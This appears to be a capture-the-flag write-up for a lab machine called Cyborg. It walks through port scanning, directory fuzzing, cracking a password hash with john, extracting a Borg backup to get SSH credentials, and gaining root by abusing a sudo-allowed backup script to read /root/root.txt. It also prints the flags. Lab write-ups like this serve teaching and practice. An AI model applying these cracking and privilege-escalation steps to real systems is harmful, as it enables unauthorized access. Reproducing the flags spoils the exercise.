Cyborg Writeup
A box involving encrypted archives, source code analysis, and privilege escalation.
š§© Initial Setup
Add the target to /etc/hosts:
echo "<IP> cyborg.thm" | sudo tee -a /etc/hosts
š Task 1: Scan the Machine
Question
How many ports are open?
Approach
nmap -sV <IP>
Result
Open ports:
- 22 (SSH)
- 80 (HTTP)
Answer
2
š Task 2: Service on Port 22
Question
What service is running on port 22?
Result
- SSH
Answer
SSH
š Task 3: Service on Port 80
Question
What service is running on port 80?
Result
- HTTP
Answer
http
š Task 4: User Flag
Question
What is the user.txt flag?
Step 1: Directory Enumeration
ffuf -u http://cyborg.thm/FUZZ -w /usr/share/wordlists/dirb/common.txt
Found:
- /admin
- /etc
Step 2: Web Exploration
- /admin ā archive file
- Users found: alex, josh, adam
- /etc ā passwd, squid.conf
Step 3: Password Cracking
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Password:
squidward
Step 4: Extract Archive
tar xf archive.tar
Step 5: Borg Extraction
borg extract /path/to/archive::music_archive
Password:
squidward
Step 6: Credentials
alex:S3cretP@s3
Step 7: SSH Login
ssh alex@<IP>
Answer
flag{1_hop3_y0u_ke3p_th3_arch1v3s_saf3}
š Task 5: Root Flag
Question
What is the root.txt flag?
Step 1: Check Sudo
sudo -l
Found:
/etc/mp3backups/backup.sh
Step 2: Exploit
sudo /etc/mp3backups/backup.sh -c "cat /root/root.txt"
Answer
flag{Than5s_f0r_play1ng_H0pĀ£_y0u_enJ053d}
Related Posts
Lian_Yu
Discovered hidden web directories, recovered FTP credentials, extracted SSH credentials from steganographic content, and ā¦
Doctor - Vulnyx
Exploited LFI to retrieve an encrypted SSH key, cracked its passphrase, gained SSH access, and escalated privileges via ā¦
FING - Vulnyx
Enumerated users through the Finger service, obtained SSH access with weak credentials, and escalated privileges via a ā¦
Lower-4
Enumerated a valid user using the Ident protocol, brute-forced SSH credentials, and abused sudo access to multitail to ā¦